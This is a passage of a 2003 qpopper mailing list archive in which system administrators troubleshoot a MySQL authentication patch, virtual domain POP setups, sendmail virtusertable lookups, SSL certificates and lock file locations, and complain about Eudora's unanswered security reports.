> >
> >
> >>I know this is the qppopper list, but can anyone from qualcomm comment on
> >>the security issues for Eudora ? I find it rather distressing that
> >>several known holes would be seemingly left unaddressed for so
> >>long. Perhaps the qualcomm people here can respond on bugtraq where the
> >>posting below was made.
> >
> >This really isn't the right list. I'm getting the distinct impression the
>
> I realize that, but I am getting concerned that after a year of no response
> on bugtraq or full disclosure the Eudora engineers are ???? I dont know,
> dont care ? Are not given the resources to care ? Dont understand ? It
> would be nice if they said something.
>
> ---Mike
Date: Mon, 15 Sep 2003 10:04:04 -1000
From: Clifton Royston <cliftonr at lava dot net>
Subject: Re: security issues
On Mon, Sep 15, 2003 at 02:24:52PM -0400, Mike Tancsa wrote:
> At 12:34 PM 15/09/2003, Daniel Senie wrote:
> >At 11:50 AM 9/15/2003, Mike Tancsa wrote:
> >>I know this is the qppopper list, but can anyone from qualcomm comment on
> >>the security issues for Eudora ? I find it rather distressing that
> >>several known holes would be seemingly left unaddressed for so
> >>long. Perhaps the qualcomm people here can respond on bugtraq where the
> >>posting below was made.
> >
> >This really isn't the right list. I'm getting the distinct impression ...
>
> I realize that, but I am getting concerned that after a year of no response
> on bugtraq or full disclosure the Eudora engineers are ???? I dont know,
> dont care ? Are not given the resources to care ? Dont understand ? It
> would be nice if they said something.
As far as I know, Randy Gellens is the *only* person from Qualcomm on
this list, and I suspect he has to struggle just to get enough free
time to work on qpopper. It's enough work trying to get qpopper
security updates released. It doesn't make sense to try to make him
responsible for Eudora as well; I don't even know if he works on
Eudora.
Conventional channels may not be working to reach the Eudora
engineers, but I doubt this one will work any better - they're just not
going to see it. The only audience you're reaching is other qpopper
users.
You could try the time-honored approach of registering the domain
"eudorasucks.com", putting some content there, and waiting for Qualcomm
corporate management to hear about it and flip out. Apart from that, I
have no suggestions for what would work.
-- Clifton
--
Clifton Royston -- cliftonr at tikitechnologies dot com
Tiki Technologies Lead Programmer/Software Architect
Did you ever fly a kite in bed? Did you ever walk with ten cats on your head?
Did you ever milk this kind of cow? Well we can do it. We know how.
If you never did, you should. These things are fun, and fun is good.
-- Dr. Seuss
Date: Mon, 15 Sep 2003 23:09:40 -0700
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: Spam question
--On Monday, September 15, 2003 1:17 PM -0400 Alan Brown <alanb at digistar dot com>
wrote:
> I've just been through this problem at $orkplace with a vendor's support
> mailbox silently trashing our mail, resulting in near-cancellation of a
> $100,000 contract. If their spam filters had been rejecting our messages
> we'd at least have known to phone them, instead of assuming we were
> being ignored.
What about your email was triggering their spam detectors? What should the
rest of us avoid?
Date: Mon, 15 Sep 2003 23:15:55 -0700
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: security issues
--On Monday, September 15, 2003 2:24 PM -0400 Mike Tancsa <mike at sentex dot net>
wrote:
> I realize that, but I am getting concerned that after a year of no response
> on bugtraq or full disclosure the Eudora engineers are ???? I dont know,
> dont care ? Are not given the resources to care ? Dont understand ? It
> would be nice if they said something.
I was looking for a decent IMAP client a year ago and settled on Mulberry
after finding that neither Eudora nor Mozilla were decent IMAP clients. (Moz
didn't handle deeply nested folders well.) Mulberry is not without its quirks,
but I still think I got my $40 worth. The developer is active and a new beta
comes out frequently.
Date: Mon, 15 Sep 2003 14:54:21 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Daniel Senie wrote:
> We can run milters. In this case we don't want to do so. By running SA from
> procmail, we can enable it for those users who want it, and not for those
> who don't. There are no circumstances under which I'd run a proxy product,
> as it would seriously interfere with routine operations.
Messagewall is specifically designed for per-user control. That's why I
recommended it.
There _are_ per-user milter plugins.
The problem is that once you're at procmail level, it's too late: spam
(or false positives) needs to be silently discarded or senders receive
bounce notifications - and large amounts of spam these days is from
forged real addresses, mostly targetting spamfighters who are
understandably getting pretty peeved off at all the bogus bounces.
AB
Date: Tue, 16 Sep 2003 06:23:04 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Kenneth Porter wrote:
> What about your email was triggering their spam detectors? What should the
> rest of us avoid?
Unknown. Even "test message" was getting trashed - in _and_ out.
Date: Tue, 16 Sep 2003 07:39:12 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
Alan Brown wrote:
> On Mon, 15 Sep 2003, Kenneth Porter wrote:
>
>
>>What about your email was triggering their spam detectors? What should the
>>rest of us avoid?
>
sysadmins who don't notice...
Ken A
> Unknown. Even "test message" was getting trashed - in _and_ out.
>
>
>
>
Date: Fri, 19 Sep 2003 09:17:42 -0700 (PDT)
From: joe ritter <glestadt4 at yahoo dot com>
Subject: problems with patch and mysql
Hello,
I just applied the mysql-qpoper patch and the compile
wentjust fine and the popper daemon starts up and
binds toport 110 just fine. However when I attempt to
telnetto port 110 I got the following:
telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Unable to process config file
/usr/local/etc/mysql-popper.conf
Connection closed by foreign host.
For the above transcript I started qpopper with the
following command line:
/usr/local/sbin/popper -d
-t /usr/local/tmp/debuglog -f
/usr/local/etc/mysql-popper.conf
my /usr/local/etc/mysql-popper.conf looks like the
following:
MysqlAuthHost 127.0.0.1
MysqlAuthPort 3306
MysqlUsername xxxxxx
MysqlPassword xxxxxx
MysqlAuthDB qpopper
MysqlAuthTable email
MysqlAuthUsernameField username
MysqlAuthPasswordField password
MysqlAuthPasswordMethod crypt
Configure Line:
./configure --enable-specialauth
--disable-check-pw-max
--enable-fast-update
--prefix=/usr/local
--enable-debugging --enable-mysql
--enable-servermode
--enable-shy
--enable-spool-dir=/var/spool/mail
--enable-log-login-mysql
--withmysqlincludepath=/usr/local/mysql/include/mysql
--enable-standalone
--with-mysqlconfig=/usr/local/etc/mysql-popper.conf
--with-mysqllibpath=/usr/local/mysql/lib/mysql
--with-openssl=/usr/local/ssl
--mandir=/usr/share/man
OS Solaris 5.8 Generic_108528-23 sun4u sparc
SUNW,Ultra-60
Qpopper = qpopper4.0.5
Patch = qpopper-mysql-0.12.patch
Mysql version = 4.0.14
The trace file shows the following after successful
binding:
Sep 19 11:39:24.980 2003 [27628] new child for
connection [main.c:923]
Sep 19 11:39:24.980 2003
Sep 19 11:39:24.983 2003 [27628] Trace and Debug
destination is file "/usr/local
/tmp/debuglog" [pop_init.c:904]
Sep 19 11:39:24.983 2003
Sep 19 11:39:24.983 2003 [27628] Processing config
file '/usr/local/etc/mysql-po
pper.conf'; CallTime=1 [pop_config.c:1354]
Sep 19 11:39:24.983 2003
Sep 19 11:39:24.983 2003 [27628] ...read line 1 (23):
MysqlAuthHost 127.0.0.
1 [pop_config.c:1390]
Sep 19 11:39:24.983 2003
Sep 19 11:39:24.984 2003 [27628] Expected "set" or
"reset", found "MysqlAuthHost
" at line 1 of config file
/usr/local/etc/mysql-popper.conf [pop_config.c:1414]
Sep 19 11:39:24.984 2003
Sep 19 11:39:24.984 2003 [27628] Finished processing
config file '/usr/local/etc
/mysql-popper.conf'; rslt=0 [pop_config.c:1538]
Sep 19 11:39:24.984 2003
If any of you could give me any feedback on how to
rectify the problem I would greatly appreciate it.
__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Interested in writing QPopper patch
Date: Fri, 19 Sep 2003 19:41:48 -0400
I wrote a hook for IMP/Horde which scans through my Sendmail virtuser file
to resolve an email address to a local user name, then use that username to
log into the system.
I would like to write a similar patch for QPopper, but I'm not very
proficient in C, especially with using dbm. Could anyone here offer some
help to get me started?
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Fri, 19 Sep 2003 21:02:40 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Interested in writing QPopper patch
Quoting Alan W. Rateliff, II (lists at rateliff dot net):
> I wrote a hook for IMP/Horde which scans through my Sendmail virtuser file
> to resolve an email address to a local user name, then use that username to
> log into the system.
>
> I would like to write a similar patch for QPopper, but I'm not very
> proficient in C, especially with using dbm. Could anyone here offer some
> help to get me started?
DBM is pretty ancient, I've used Berkeley DB for all things
map since 1993 or so.
That said, LDAP is here and solid and very valuable for keeping
maps in. I make a change in LDAP, and 3 MTAs see it right away
(same as with Hesiod when I used that in the early-mid 90s).
LDAP is independant of sendmail and can be queried.
The right and easy answer would be if sendmail used a LIBRARY
for these map lookups (and things like readcf() so you could query
a library routine for, say, the value of Class W or a option
setting or a list of queue directories).
But they don't.
An easy hook, that would be map type indendant, would be to write
a rule, say "Scheck_virtusertable" and have it just return the
virtusertable lookup. Nothing within sendmail would call that rule,
so no harm. But YOU could do the C or perl equiv of:
echo "check_virtusertable bob@example dot com" | sendmail -bt
and sendmail would emit the final info.
I snagged from the stanza below Sparse1 (handle virtusers) until the Recurse
line (all one para) into "check_vut" which emits the full email triple
(mailer, host, username).
First, send the input through rule 3:
Scheck_vut
R$* $: $>3 $1 #get focus on domain/normalize
BigBlobOfVirtuserHere
Then it would be just a little work to replace that last line
(recurse) with a "if domain is a virtual domain, call self again"
then clean it up.
Without much testing:
R <$+ @ $={VirtHost} > $+<$+> $> check_vut $1 @ $2
R <$+ @ $+ > $+<$+> $: $1@$2
So
echo "user@example dot com" |sendmail -bt | tail -1
gives me:
check_vut returns: user @ my . realhost . domain
Who calls sendmail ugly :)
It's not pretty, but it's portable enough that virtusertable
can be multiple files, LDAP, db, dbm, HESIOD, SQL, or combinations.
It what sendmail would get.
Just my $0.04
Date: Fri, 19 Sep 2003 21:04:19 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Spam question
Quoting Ken Anderson (ka at pacific dot net):
> Alan Brown wrote:
>
> >On Mon, 15 Sep 2003, Kenneth Porter wrote:
> >
> >
> >>What about your email was triggering their spam detectors? What should the
> >>rest of us avoid?
> >
>
> sysadmins who don't notice...
> Ken A
It can be hard to notice an anomoly when you get 30,000 messages/hour.
Even parsed logs fly by in realtime (see "fromto" for handy tool).
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Re: Interested in writing QPopper patch
Date: Sat, 20 Sep 2003 01:11:23 -0400
----- Original Message -----
From: "Chuck Yerkes" <chuck+qpopper at yerkes dot com>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Friday, September 19, 2003 9:02 PM
Subject: Re: Interested in writing QPopper patch
> DBM is pretty ancient, I've used Berkeley DB for all things
> map since 1993 or so.
That's actually what's in use here; dbm is just a genericism.
> That said, LDAP is here and solid and very valuable for keeping
> maps in. I make a change in LDAP, and 3 MTAs see it right away
> (same as with Hesiod when I used that in the early-mid 90s).
[snip]
I'm working in at least three environments that will NEVER be updated to
NIS+ or LDAP. I cannot convince the owners that the time necessary to
centralize the user store is worth the billing, and I'm not apt to do it for
free. Ergo, these environments will remain flat-file with a half-assed
implementation of cron-based replication.
As for my own, I intend to use NIS+. Anything that uses PAM will be able to
use the NIS+ user store. (I'm working in Solaris 8, BTW.) I considered
LDAP, but I've had a complete dog of a time getting LDAP to work properly
(OpenLDAP won't compile, and nothing wants to recognize LDAP libraries that
are supposedly installed already.) I understand Solaris 9 has LDAP
natively, but I'm just building up flight hours for 9, and not in any
production environment.
So in the long run, a central user-store approach is where I will go,
working under PAM so I can utilize NIS+, LDAP, Active Directory, or
whatever. But I need to start somewhere.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Sat, 20 Sep 2003 15:14:23 +1000
From: Wayne Heming <wheming at hemnet.com dot au>
Subject: How to setup multiple domain pop server
Does anyone know where I can find a step by step guide to setting up
multiple domains on a single mail server for use with popper
eg
user at domain1.com dot au
user at domain2.com dot au
etc
Wayne
Date: Sat, 20 Sep 2003 13:44:38 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Interested in writing QPopper patch
Quoting Alan W. Rateliff, II (lists at rateliff dot net):
> ----- Original Message -----
> From: "Chuck Yerkes" <chuck+qpopper at yerkes dot com>
> > That said, LDAP is here and solid and very valuable for keeping
> > maps in. I make a change in LDAP, and 3 MTAs see it right away
> > (same as with Hesiod when I used that in the early-mid 90s).
...
> I'm working in at least three environments that will NEVER be updated to
> NIS+ or LDAP. I cannot convince the owners that the time necessary to
> centralize the user store is worth the billing, and I'm not apt to do it for
> free. Ergo, these environments will remain flat-file with a half-assed
> implementation of cron-based replication.
>
> As for my own, I intend to use NIS+. Anything that uses PAM will be able to
> use the NIS+ user store. (I'm working in Solaris 8, BTW.) I considered
> LDAP, but I've had a complete dog of a time getting LDAP to work properly
> (OpenLDAP won't compile, and nothing wants to recognize LDAP libraries that
> are supposedly installed already.) I understand Solaris 9 has LDAP
> natively, but I'm just building up flight hours for 9, and not in any
> production environment.
>
> So in the long run, a central user-store approach is where I will go,
> working under PAM so I can utilize NIS+, LDAP, Active Directory, or
> whatever. But I need to start somewhere.
Um, NIS+ is a dog. Sun folks run from NIS+.
SUN is moving to LDAP. The ORA LDAP book looked
pretty good for starting with OpenLDAP (getting
the server up is one challenge, doing data well
is another (easier IMHO) one).
It's tough to wrap your brain around. Just like with
DNS many years ago, I had the big "aha" moment with
LDAP when I understood it.
OpenLDAP will work best with db4.1.x (whatever's
current - a lot of perf things have gone into DB4
because of OpenLDAP work.
I'm starting to get it in at a new client. All data will
be in LDAP (incl phone numbers, office info, etc for people
and another OU for machines (serial numbers, processor/OS
info, location, console server info, etc). I'm appalled
at sheets of paper that have info about, say console servers
and you use that to find the right port, but use another paper
for host info, etc.
For NIS only machines (old Solaris 2.6 boxes and some AIX
machiens), we can extract from LDAP into NIS maps. There
are NIS servers from PADL that serve NIS info but use LDAP
as its back end.
We've needed a good directory for 10 or more years.
It replaces a billion files for one point of access and management
- from NIS to all sendmail maps to "people use" things like phone
books (Macs will speak LDAP for addressbook and for name servers,
Mozilla will use it for preferences and book marks - you don't care
what machien you're on, you have the info via the network).
Now, if qpopper could do native auth against LDAP for the
non-PAM platforms ...
Subject: Re: How to setup multiple domain pop server
From: Robert Brandtjen <rob at prometheusmedia dot com>
Date: 20 Sep 2003 18:34:12 -0500
On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
> Does anyone know where I can find a step by step guide to setting up
> multiple domains on a single mail server for use with popper
>
> eg
>
> user at domain1.com dot au
> user at domain2.com dot au
> etc
>
> Wayne
Webmin (http://webmin.com) has a nice GUI utility for the newbie- makes
life very easy and supports several MTA's.
--
Robert Brandtjen <rob at prometheusmedia dot com>
Prometheusmedia
Date: Sun, 21 Sep 2003 11:05:25 +1000
From: Wayne Heming <wheming at hemnet.com dot au>
Subject: Re: How to setup multiple domain pop server
I wouldn't consider myself as a newbie, I already have the MTA (sendmail)
setup for multiple domains, but the generic usernames like "enquiry",
"sales", "orders", "admin" etc are my problem, all the domain owners want
the same usernames.
So what I mean by multiple domains, I need different users with the same
name but different domains on the same pop server.
I did see a few threads a couple of years ago regarding this but have
searched the archives and can't really see a "how-to"
Wayne
At 06:34 PM 20/09/2003 -0500, Robert Brandtjen wrote:
>On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
> > Does anyone know where I can find a step by step guide to setting up
> > multiple domains on a single mail server for use with popper
> >
> > eg
> >
> > user at domain1.com dot au
> > user at domain2.com dot au
> > etc
> >
> > Wayne
>
>
>Webmin (http://webmin.com) has a nice GUI utility for the newbie- makes
>life very easy and supports several MTA's.
>--
>Robert Brandtjen <rob at prometheusmedia dot com>
>Prometheusmedia
From: "Lisa Casey" <lisa at jellico dot net>
Subject: Re: How to setup multiple domain pop server
Date: Sat, 20 Sep 2003 22:17:33 -0400
Hi,
What MTA do you use? Sendmail? This is a function of your MTA and has
nothing to do with qpopper. See www.sendmail.org and search for virtual
hosting.
Lisa Casey
----- Original Message -----
From: "Wayne Heming" <wheming at hemnet.com dot au>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Saturday, September 20, 2003 9:05 PM
Subject: Re: How to setup multiple domain pop server
> I wouldn't consider myself as a newbie, I already have the MTA (sendmail)
> setup for multiple domains, but the generic usernames like "enquiry",
> "sales", "orders", "admin" etc are my problem, all the domain owners want
> the same usernames.
>
> So what I mean by multiple domains, I need different users with the same
> name but different domains on the same pop server.
>
> I did see a few threads a couple of years ago regarding this but have
> searched the archives and can't really see a "how-to"
>
> Wayne
>
>
>
> At 06:34 PM 20/09/2003 -0500, Robert Brandtjen wrote:
> >On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
> > > Does anyone know where I can find a step by step guide to setting up
> > > multiple domains on a single mail server for use with popper
> > >
> > > eg
> > >
> > > user at domain1.com dot au
> > > user at domain2.com dot au
> > > etc
> > >
> > > Wayne
Date: Sat, 20 Sep 2003 23:45:22 -0400
From: Joe Maimon <jmaimon at ttec dot com>
Subject: Re: How to setup multiple domain pop server
Might I suggest a policy of usernames/mailboxes: 1 Per Person and
whatever email address they want in their own domain name.
You may dictate the username and password. Why should they care what
their mailbox username is anyways?
You can use the sendmail virtuserdomains and virtusertable to block all
username across domain name bleeding.
Joe
Wayne Heming wrote:
> I wouldn't consider myself as a newbie, I already have the MTA
> (sendmail) setup for multiple domains, but the generic usernames like
> "enquiry", "sales", "orders", "admin" etc are my problem, all the
> domain owners want the same usernames.
>
> So what I mean by multiple domains, I need different users with the
> same name but different domains on the same pop server.
>
> I did see a few threads a couple of years ago regarding this but have
> searched the archives and can't really see a "how-to"
>
> Wayne
>
>
>
> At 06:34 PM 20/09/2003 -0500, Robert Brandtjen wrote:
>
>> On Sat, 2003-09-20 at 00:14, Wayne Heming wrote:
>> > Does anyone know where I can find a step by step guide to setting up
>> > multiple domains on a single mail server for use with popper
>> >
>> > eg
>> >
>> > user at domain1.com dot au
>> > user at domain2.com dot au
>> > etc
>> >
>> > Wayne
>>
>>
>> Webmin (http://webmin.com) has a nice GUI utility for the newbie- makes
>> life very easy and supports several MTA's.
>> --
>> Robert Brandtjen <rob at prometheusmedia dot com>
>> Prometheusmedia
>
>
>
Date: Sun, 21 Sep 2003 12:56:21 +0100
From: Richard Gration <richard at zync.co dot uk>
Subject: Re: How to setup multiple domain pop server
Wayne Heming wrote:
> Does anyone know where I can find a step by step guide to setting up
> multiple domains on a single mail server for use with popper
>
> eg
>
> user at domain1.com dot au
> user at domain2.com dot au
> etc
>
> Wayne
>
Hi there,
I've had a good look for this 2 or 3 times in the last 12 months and
haven't found anything. The basic problem is that qpopper looks up the
POP user in /etc/passwd. You need to find a way to look it up somewhere
else, an LDAP directory or an SQL database being the most likely
solutions, but qpopper doesn't support either of these directly. There
is a PAM module for qpopper, and it can be made to use an LDAP directory
for lookups. I don't know about sendmail, but exim can use LDAP lookup.
This is the official line:
http://www.eudora.com/qpopper/faq.html#password_files
These references provide more hope:
http://lists.debian.org/debian-user/2001/debian-user-200110/msg02452.html
http://web.systhug.com/pam/
Good luck
Rich
Date: Sun, 21 Sep 2003 08:17:45 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: How to setup multiple domain pop server
On Sun, 21 Sep 2003, Richard Gration wrote:
> I've had a good look for this 2 or 3 times in the last 12 months and
> haven't found anything. The basic problem is that qpopper looks up the
> POP user in /etc/passwd. You need to find a way to look it up somewhere
> else, an LDAP directory or an SQL database being the most likely
> solutions, but qpopper doesn't support either of these directly.
There are _hacks_ to do this, but if the original poster wants it, he's
better off moving to a pop3/imap server which can handle it
semi-natively.
Cyrus or Courier being good choices.
People, qpopper is good at what it does (SMALL, SIMPLE(*) server pop3
facilities), but let's keep it that way, rather than trying to turn it
into a marching band.
(*) Emphasis on small and simple. I wouldn't use it past 1500 users, or
for trying to pull half the stunts people are attempting here. If you
want pop3 users to provide user@domain and have mapping, use a server
designed from the ground up for virtual domain facilities.
Date: Sun, 21 Sep 2003 13:39:53 +0100
From: Richard Gration <richard at zync.co dot uk>
Subject: Re: How to setup multiple domain pop server
Alan Brown wrote:
> On Sun, 21 Sep 2003, Richard Gration wrote:
>
>>You need to find a way to look it up somewhere
>>else, an LDAP directory or an SQL database being the most likely
>>solutions, but qpopper doesn't support either of these directly.
>
> There are _hacks_ to do this, but if the original poster wants it, he's
> better off moving to a pop3/imap server which can handle it
> semi-natively.
Fair enough. All I wanted to do was stop the OP from searching usenet
for days. That's what I did before I was convinced that qpopper really
wasn't a good pop daemon for virtual domains. None of the other posts
spoke directly to his original question.
R
Date: Sun, 21 Sep 2003 09:12:47 -0700 (PDT)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: How to setup multiple domain pop server
Wayne,
While i agree with Alan's post (parts of it anyway), i still believe in
flexibility when it comes to programs, whether it be through hacks, or
whatever..and giving people what they want, within reason :-)
So if you want to do the virtual domain support, you can use my "hack", as
it was so elegantly put :-)
It pulls users from MySQL, so you'll have to have that, put your users in
it..and then have your MTA support virtual domains also. whether it be a
hack to sendmail, or going with an MTA that has support already in it
(Postfix for example)
My patch for qpopper is at http://www.asteroid-b612.org/software/#qpopper
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"You find magic from your god, and I find magic everywhere"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: QPOP/SSL vs Outlook Express
Date: Mon, 22 Sep 2003 16:06:17 -0400
Okay, I know I've seen an answer here before, but I wipe out my local
archive thinking a much better, more searchable one was available.
Anyway, I was fortunate enough to receive my secure certificate today and am
trying to get it working in QPopper. My test platform is Outlook Express (I
understand it's the most trouble.) I'm getting these errors:
-ERR Unknown command: "\200l^A^C^A"
Then an EOF error as it closes. I'm assuming my key and certs are
configured correctly since it's not complaining about it anymore.
Help is appreciated.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Re: QPOP/SSL vs Outlook Express
Date: Mon, 22 Sep 2003 17:07:57 -0400
----- Original Message -----
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Monday, September 22, 2003 4:06 PM
Subject: QPOP/SSL vs Outlook Express
> Okay, I know I've seen an answer here before, but I wipe out my local
> archive thinking a much better, more searchable one was available.
>
> Anyway, I was fortunate enough to receive my secure certificate today and
am
> trying to get it working in QPopper. My test platform is Outlook Express
(I
> understand it's the most trouble.) I'm getting these errors:
>
> -ERR Unknown command: "\200l^A^C^A"
Got it. Randy answered this question a few months ago. The answer was to
set tls-support = alternate-port
in my options file.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Mon, 22 Sep 2003 17:44:25 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: How to setup multiple domain pop server
Quoting Alan Brown (alanb at digistar dot com):
> On Sun, 21 Sep 2003, Richard Gration wrote:
...
> There are _hacks_ to do this, but if the original poster wants it, he's
> better off moving to a pop3/imap server which can handle it
> semi-natively.
Yes.
> People, qpopper is good at what it does (SMALL, SIMPLE(*) server pop3
> facilities), but let's keep it that way, rather than trying to turn it
> into a marching band.
>
>
> (*) Emphasis on small and simple. I wouldn't use it past 1500 users, or
> for trying to pull half the stunts people are attempting here. If you
> want pop3 users to provide user@domain and have mapping, use a server
> designed from the ground up for virtual domain facilities.
Damn, I'll have to remove it from the 4 million user plus systems I've
built before. See also nick christenson's paper on his work at Earthlink.
(and yes, mail.local and qpopper were hacked some, but mostly for
auth and to handle NFS based storage).
Best answer to orig question:
virtusertable maps "info@domain1" to info-domain1
and client pops in as that.
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: SSL CA Certificate problem
Date: Mon, 22 Sep 2003 17:47:54 -0400
Here's another one. My SSL certificate is a Comodo InstantSSL. When I
received my cert, I also got a ca-bundle file. I was able to use this file
with Apache and Sendmail, and connecting clients use the cert without a
problem.
With QPopper, however, upon connection, Outlook Express says that the
certificate is not from a trusted authority. I didn't see anything in the
config that looks like a ca_cert option... is there another way?
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Mon, 22 Sep 2003 18:16:54 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: How to setup multiple domain pop server
On Mon, 22 Sep 2003, Chuck Yerkes wrote:
> Damn, I'll have to remove it from the 4 million user plus systems I've
> built before. See also nick christenson's paper on his work at Earthlink.
I'm aware of those efforts. I'm also sure that if you were to start over
today you wouldn't do it with Qpopper
> Best answer to orig question:
> virtusertable maps "info@domain1" to info-domain1
> and client pops in as that.
better to be domain1-info, IMHO, but I suspect the OP doesn't want to do
it that way for whatever reason.
AB
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: SSL help, Qpopper and Sendmail
Date: Mon, 22 Sep 2003 23:06:44 -0400
Okay, I'm at my wit's end. I would appreciate anyone who has experience
with non-VeriSign certificates with QPopper and/or Sendmail. Specifically,
I am using Comodo InstantSSL.
According to their webfaq [1], the root cert is supposedly part of Windows
since 98SE, and MacOS 9 and up, and compatible with several modern browsers.
The problem I'm having is that no client wants to trust the certificate as
installed in QPopper and Sendmail. Well, Outlook Express does, but not
before barfing on the POP3 server. Eudora, Pegasus, and Netscape Messenger
all pop up warning dialogues saying the root is not trusted.
I'm hoping this is just a server configuration error. I spent the money on
a real cert because I wanted to be "legit," but if I knew it would be this
much of a problem I just would have done like everyone else and sign my own
cert.
As usual, I appreciate any help I can get. Sendmail offers please reply
privately.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Tue, 23 Sep 2003 19:10:37 +1000
From: Wayne Heming <wheming at hemnet.com dot au>
Subject: Re: How to setup multiple domain pop server
Certainly got a little discussion going.
All valid points, but more and more virtual domains are out there. Sooner
or later it will be the norm rather than the exception.
Will have to go with this for the time being.
> > Best answer to orig question:
> > virtusertable maps "info@domain1" to info-domain1
> > and client pops in as that.
Wayne
At 06:16 PM 22/09/2003 -0400, Alan Brown wrote:
>On Mon, 22 Sep 2003, Chuck Yerkes wrote:
>
> > Damn, I'll have to remove it from the 4 million user plus systems I've
> > built before. See also nick christenson's paper on his work at Earthlink.
>
>I'm aware of those efforts. I'm also sure that if you were to start over
>today you wouldn't do it with Qpopper
>
> > Best answer to orig question:
> > virtusertable maps "info@domain1" to info-domain1
> > and client pops in as that.
>
>better to be domain1-info, IMHO, but I suspect the OP doesn't want to do
>it that way for whatever reason.
>
>AB
Date: Tue, 23 Sep 2003 14:52:53 -0000
Subject: .lock files and quotas
From: "Chris Szilagyi" <chris at apex-internet dot com>
Hello,
I've got an issue with Qpopper 3.1.2, on Red Hat 7.1 (with sendmail and
procmail). Basically, I have a problem whereby I'd like to tell Qpopper
where to place the <user>.lock files. It seems the default is /var/mail/ and
I'm having issues with user quotas, and would like to have it put the .lock
files in a location like /var/lock/mail or something other than in the spool
dir. I've read older posts that says this can be done but I haven't seen
anything in the Qpopper 3.1.2 documentation on this. Can somebody please
tell me how this can be done?? Thanks for all feedback...
--
Chris
Date: Tue, 23 Sep 2003 17:55:31 -0000
Subject: Re: .lock files and quotas
From: "Chris Szilagyi" <chris at apex-internet dot com>
"Errol U. Neal Jr." <errol.neal at enhtech dot com> said:
> At 10:52 AM 9/23/2003, Chris Szilagyi wrote:
> >Hello,
> >
> >I've got an issue with Qpopper 3.1.2, on Red Hat 7.1 (with sendmail and
> >procmail). Basically, I have a problem whereby I'd like to tell Qpopper
> >where to place the <user>.lock files. It seems the default is /var/mail/
and
> >I'm having issues with user quotas, and would like to have it put the .lock
> >files in a location like /var/lock/mail or something other than in the
spool
> >dir. I've read older posts that says this can be done but I haven't seen
> >anything in the Qpopper 3.1.2 documentation on this. Can somebody please
> >tell me how this can be done?? Thanks for all feedback...
> >
> >--
> >Chris
>
>
> You need to rebuild the rpm or the source. Check the configure options. I
>
Actually I am using a version I built from the source for v 3.1.2. I have
looked through the documentation and have not seen anything about redirecting
the <user>.lock files to another location. I am using "--enable-temp-drop-
dir=" but it only seems to affect the .<user>.pop files. I would appreciate
any additional help or if anybody can recall what exactly needs to be done in
order to redirect the <user>.lock files. Thanks...
--
Chris
Date: Tue, 23 Sep 2003 14:32:44 -0700
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: SSL help, Qpopper and Sendmail
--On Monday, September 22, 2003 11:06 PM -0400 "Alan W. Rateliff, II"
<lists at rateliff dot net> wrote:
> The problem I'm having is that no client wants to trust the certificate as
> installed in QPopper and Sendmail. Well, Outlook Express does, but not
> before barfing on the POP3 server. Eudora, Pegasus, and Netscape Messenger
